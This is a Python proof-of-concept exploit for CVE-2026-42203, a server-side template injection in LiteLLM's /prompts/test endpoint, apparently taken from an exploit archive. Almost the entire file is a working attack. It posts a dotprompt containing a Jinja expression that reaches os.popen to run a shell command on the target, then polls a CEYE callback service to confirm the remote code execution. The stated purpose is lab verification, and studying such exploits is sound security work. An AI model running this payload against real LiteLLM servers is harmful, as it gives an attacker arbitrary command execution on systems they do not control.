5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE_2026_42203.py PY
#!/usr/bin/env python3
"""
Minimal LiteLLM CVE-2026-42203 /prompts/test SSTI PoC.

Proof strategy:
  Execute Python code that requests: http://{random}.{your-ceye-domain}/
  Then query CEYE request records with filter={random}. If CEYE received the
  callback, the SSTI command execution path is confirmed.

CEYE domain/token and the LiteLLM API key are intentionally not hardcoded.
Pass them with CLI flags or environment variables when running in your lab.
"""

from __future__ import annotations

import argparse
import json
import os
import secrets
import string
import sys
import threading
import time
from typing import Any, Dict, Optional

import requests


# Default values for the command-line options defined in parse_args().
DEFAULT_TARGET = "http://127.0.0.1:4000"
DEFAULT_MODEL = "gpt-3.5-turbo"
# Names of the environment variables read when the matching flag is omitted.
DEFAULT_API_KEY_ENV = "LITELLM_API_KEY"
DEFAULT_CEYE_DOMAIN_ENV = "CEYE_DOMAIN"
DEFAULT_CEYE_TOKEN_ENV = "CEYE_TOKEN"
# Value sent as the "type" query parameter of the CEYE records API.
DEFAULT_CEYE_TYPE = "request"
# Timing defaults, all in seconds.
DEFAULT_TIMEOUT = 10.0  # timeout applied to each individual HTTP request
DEFAULT_WAIT = 20.0  # total time spent polling CEYE for the callback
DEFAULT_INTERVAL = 3.0  # pause between two CEYE polls

# Process exit codes returned by main().
EXIT_VULNERABLE = 0  # CEYE recorded the callback
EXIT_NOT_VULNERABLE = 1  # no callback was seen within the wait window
EXIT_CONFIG_ERROR = 2  # argument validation failed
# NOTE(review): not returned by any code visible in this file — confirm intended use.
EXIT_INCONCLUSIVE = 3


def random_filter(length: int = 12) -> str:
    """Return a random marker made of lowercase ASCII letters and digits.

    The marker is used as the sub-domain label of the callback URL and as the
    filter value when querying CEYE, so it must be DNS-label safe.

    Args:
        length: Number of characters to generate.

    Returns:
        A string of ``length`` characters drawn with ``secrets.choice``.
    """
    charset = string.ascii_lowercase + string.digits
    picks = [secrets.choice(charset) for _ in range(length)]
    return "".join(picks)


def quote_for_jinja_single_string(value: str) -> str:
    """Escape ``value`` for use inside a single-quoted Jinja string literal.

    Backslashes are doubled, single quotes are backslash-escaped and newline
    characters become the two-character sequence ``\\n``.

    Args:
        value: Raw text to embed.

    Returns:
        The escaped text.
    """
    # One pass over the input: none of the replacement texts contains a
    # character that a later rule would need to rewrite again.
    escapes = str.maketrans(
        {
            "\\": "\\\\",
            "'": "\\'",
            "\n": "\\n",
        }
    )
    return value.translate(escapes)


def build_payload(model: str, command: str) -> Dict[str, Any]:
    """Build the JSON body that is posted to the ``/prompts/test`` endpoint.

    The command is escaped with ``quote_for_jinja_single_string`` and placed
    inside a Jinja expression, which in turn is embedded in the ``User:`` line
    of a dotprompt document whose front matter names ``model``.

    Args:
        model: Value written to the ``model`` front-matter field.
        command: Shell command to embed in the template expression.

    Returns:
        A dict with the keys ``dotprompt_content`` and ``prompt_variables``.
    """
    escaped = quote_for_jinja_single_string(command)
    expression = "{{ cycler.__init__.__globals__.os.popen('" + escaped + "').read() }}"
    # Front matter, a blank line, the user turn, and a trailing newline.
    document_lines = [
        "---",
        f"model: {model}",
        "temperature: 0",
        "---",
        "",
        f"User: {expression}",
        "",
    ]
    request_body: Dict[str, Any] = {
        "dotprompt_content": "\n".join(document_lines),
        "prompt_variables": {},
    }
    return request_body


def build_python_http_command(url: str) -> str:
    """Return a ``python3 -c`` shell command that performs one GET on ``url``.

    The URL is interpolated verbatim between single quotes; no escaping is
    applied here.

    Args:
        url: Address the generated one-liner should request.

    Returns:
        The complete command line as a single string.
    """
    snippet = f"import urllib.request; urllib.request.urlopen('{url}', timeout=5).read()"
    return f'python3 -c "{snippet}"'


def trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
) -> None:
    """POST ``body`` to ``<target>/prompts/test`` and report transport problems.

    The function never raises for request failures: connection errors and
    timeouts are printed, and so is any non-2xx HTTP status. Without the status
    line a rejected key (401/403) or a missing route (404) would be
    indistinguishable from a target that simply never called back.

    Args:
        target: Base URL of the service; trailing slashes are ignored.
        api_key: Sent as a ``Bearer`` token in the ``Authorization`` header.
        body: JSON-serialisable request body.
        timeout: Timeout in seconds passed to ``requests.post``.
        verify_tls: Whether to verify the server's TLS certificate.
    """
    endpoint = target.rstrip("/") + "/prompts/test"
    headers = {
        "Authorization": f"Bearer {api_key}",
        "Content-Type": "application/json",
    }
    try:
        response = requests.post(
            endpoint,
            headers=headers,
            json=body,
            timeout=timeout,
            verify=verify_tls,
        )
    except requests.RequestException as exc:
        print(f"[!] Background trigger request error: {exc}")
        return

    # Purely informational: an error status alone does not prove whether the
    # template was rendered, so the caller's verdict still comes from CEYE.
    if not 200 <= response.status_code < 300:
        print(f"[!] Background trigger request returned HTTP {response.status_code}")


def start_trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
) -> None:
    """Run ``trigger_payload`` on a daemon thread and return immediately.

    The request is sent in the background so the caller can start polling for
    the callback without waiting for the HTTP response. Because the thread is
    a daemon, it does not keep the process alive.

    Args:
        target: Base URL of the service.
        api_key: Key forwarded to ``trigger_payload``.
        body: Request body forwarded to ``trigger_payload``.
        timeout: Request timeout in seconds.
        verify_tls: Whether TLS certificates are verified.
    """
    endpoint = f"{target.rstrip('/')}/prompts/test"
    # Positional order matches the signature of trigger_payload.
    worker = threading.Thread(
        target=trigger_payload,
        args=(target, api_key, body, timeout, verify_tls),
        daemon=True,
    )
    worker.start()
    print(f"[*] Sending payload to: POST {endpoint}")


def query_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    timeout: float,
) -> Dict[str, Any]:
    """Fetch records from the CEYE records API.

    Args:
        token: CEYE API token, sent as the ``token`` query parameter.
        record_type: Sent as the ``type`` query parameter.
        filter_value: Sent as the ``filter`` query parameter.
        timeout: Request timeout in seconds.

    Returns:
        The decoded JSON response body.

    Raises:
        requests.RequestException: On transport errors or a non-success HTTP
            status (via ``raise_for_status``).
        ValueError: If the response body is not valid JSON.
    """
    query = {
        "token": token,
        "type": record_type,
        "filter": filter_value,
    }
    reply = requests.get("http://api.ceye.io/v1/records", params=query, timeout=timeout)
    reply.raise_for_status()
    return reply.json()


def ceye_has_callback(data: Dict[str, Any], filter_value: str) -> bool:
    """Tell whether ``filter_value`` occurs anywhere in the serialised ``data``.

    The whole response is dumped to JSON text (non-ASCII characters kept as-is)
    and searched as a plain substring, so keys and values both count.

    Args:
        data: Decoded response to inspect.
        filter_value: Marker to look for.

    Returns:
        ``True`` when the marker is found, ``False`` otherwise.
    """
    serialized = json.dumps(data, ensure_ascii=False)
    return serialized.find(filter_value) != -1


def poll_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    wait: float,
    interval: float,
    timeout: float,
) -> bool:
    """Poll CEYE until a record matching ``filter_value`` appears or time runs out.

    At least one query is always made. Query failures (transport errors, bad
    status, undecodable JSON) do not abort the loop; the most recent one is
    printed if no match was found.

    Args:
        token: CEYE API token.
        record_type: CEYE record type to query.
        filter_value: Marker expected in the matching record.
        wait: Total polling budget in seconds.
        interval: Pause between two queries in seconds.
        timeout: Timeout in seconds for each query.

    Returns:
        ``True`` as soon as a matching record is seen; ``False`` if the budget
        is exhausted, whether because no record matched or every query failed.
    """
    # A monotonic clock keeps the budget correct if the system time is adjusted.
    deadline = time.monotonic() + wait
    last_error: Optional[str] = None

    while True:
        try:
            data = query_ceye(token, record_type, filter_value, timeout)
            if ceye_has_callback(data, filter_value):
                print(f"[+] CEYE matched filter: {filter_value}")
                print(json.dumps(data, ensure_ascii=False, indent=2))
                return True
        except (requests.RequestException, ValueError) as exc:
            last_error = str(exc)

        remaining = deadline - time.monotonic()
        if remaining <= 0:
            break
        # Never sleep past the deadline; the final query then lands right at it.
        time.sleep(min(interval, remaining))

    if last_error:
        print(f"[!] Last CEYE query error: {last_error}")
    return False


def parse_args() -> argparse.Namespace:
    """Define the command-line interface and parse ``sys.argv``.

    The API key, CEYE token and CEYE domain default to the environment
    variables named by the ``DEFAULT_*_ENV`` constants (empty string if unset).

    Returns:
        The parsed arguments.
    """
    cli = argparse.ArgumentParser(
        description="Minimal LiteLLM /prompts/test SSTI PoC with CEYE request callback."
    )

    cli.add_argument(
        "-t",
        "--target",
        default=DEFAULT_TARGET,
        help=f"LiteLLM base URL, default: {DEFAULT_TARGET}",
    )
    cli.add_argument(
        "--auth",
        "--api-key",
        dest="api_key",
        default=os.getenv(DEFAULT_API_KEY_ENV, ""),
        help=f"LiteLLM key allowed to call /prompts/test. Can also be set with {DEFAULT_API_KEY_ENV}.",
    )
    cli.add_argument(
        "--model",
        default=DEFAULT_MODEL,
        help=f"dotprompt model value, default: {DEFAULT_MODEL}",
    )
    cli.add_argument(
        "--ceye-token",
        default=os.getenv(DEFAULT_CEYE_TOKEN_ENV, ""),
        help=f"CEYE API token. Can also be set with {DEFAULT_CEYE_TOKEN_ENV}.",
    )
    cli.add_argument(
        "--ceye-domain",
        default=os.getenv(DEFAULT_CEYE_DOMAIN_ENV, ""),
        help=f"CEYE domain. Can also be set with {DEFAULT_CEYE_DOMAIN_ENV}.",
    )
    cli.add_argument(
        "--ceye-type",
        default=DEFAULT_CEYE_TYPE,
        help=f"CEYE record type, default: {DEFAULT_CEYE_TYPE}",
    )

    # The three timing options share the same shape: a float with a default.
    timing_options = (
        ("--timeout", DEFAULT_TIMEOUT, f"HTTP timeout, default: {DEFAULT_TIMEOUT}s"),
        ("--wait", DEFAULT_WAIT, f"Seconds to wait for CEYE callback, default: {DEFAULT_WAIT}s"),
        ("--interval", DEFAULT_INTERVAL, f"CEYE polling interval, default: {DEFAULT_INTERVAL}s"),
    )
    for flag, fallback, description in timing_options:
        cli.add_argument(flag, type=float, default=fallback, help=description)

    cli.add_argument(
        "--insecure",
        action="store_true",
        help="Disable TLS certificate verification for target request",
    )
    return cli.parse_args()


def validate_args(args: argparse.Namespace) -> Optional[str]:
    """Check the parsed arguments and describe the first problem found.

    Text options must contain something other than whitespace, and the timing
    options must be strictly positive. Checks run in a fixed order and stop at
    the first failure.

    Args:
        args: Namespace produced by ``parse_args``.

    Returns:
        An error message for the first invalid option, or ``None`` when all
        options are acceptable.
    """
    required_text = (
        ("target", "--target must not be empty"),
        ("api_key", "--auth/--api-key must not be empty"),
        ("ceye_token", "--ceye-token must not be empty"),
        ("ceye_domain", "--ceye-domain must not be empty"),
    )
    for attribute, message in required_text:
        if not getattr(args, attribute).strip():
            return message

    strictly_positive = (
        ("timeout", "--timeout must be greater than 0"),
        ("wait", "--wait must be greater than 0"),
        ("interval", "--interval must be greater than 0"),
    )
    for attribute, message in strictly_positive:
        if getattr(args, attribute) <= 0:
            return message

    return None


def main() -> int:
    """Run the check end to end and return the process exit code.

    Steps: parse and validate arguments, generate a random marker, build the
    callback command and request body, send the request in the background, and
    poll CEYE for a record containing the marker.

    Returns:
        ``EXIT_CONFIG_ERROR`` when validation fails, ``EXIT_VULNERABLE`` when
        CEYE recorded the callback, otherwise ``EXIT_NOT_VULNERABLE``.
    """
    args = parse_args()
    validation_error = validate_args(args)
    if validation_error:
        print(f"[CONFIG_ERROR] {validation_error}", file=sys.stderr)
        return EXIT_CONFIG_ERROR

    filter_value = random_filter()
    # Validation only checks the stripped value, so strip before building the
    # host name; stray whitespace would otherwise end up inside the URL.
    ceye_domain = args.ceye_domain.strip()
    callback_url = f"http://{filter_value}.{ceye_domain}/"
    command = build_python_http_command(callback_url)
    body = build_payload(args.model, command)

    print(f"[*] Python payload: {command}")
    # The API token is a credential: keep it out of terminal scrollback and
    # captured logs. The remaining parameters are enough to repeat the query.
    print(
        "[*] CEYE query: "
        f"http://api.ceye.io/v1/records?token=<redacted>&type={args.ceye_type}&filter={filter_value}"
    )

    start_trigger_payload(
        target=args.target,
        api_key=args.api_key,
        body=body,
        timeout=args.timeout,
        verify_tls=not args.insecure,
    )

    if poll_ceye(
        token=args.ceye_token,
        record_type=args.ceye_type,
        filter_value=filter_value,
        wait=args.wait,
        interval=args.interval,
        timeout=args.timeout,
    ):
        print("[VULNERABLE] CEYE received the callback request.")
        return EXIT_VULNERABLE

    print("[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.")
    return EXIT_NOT_VULNERABLE


if __name__ == "__main__":
    raise SystemExit(main())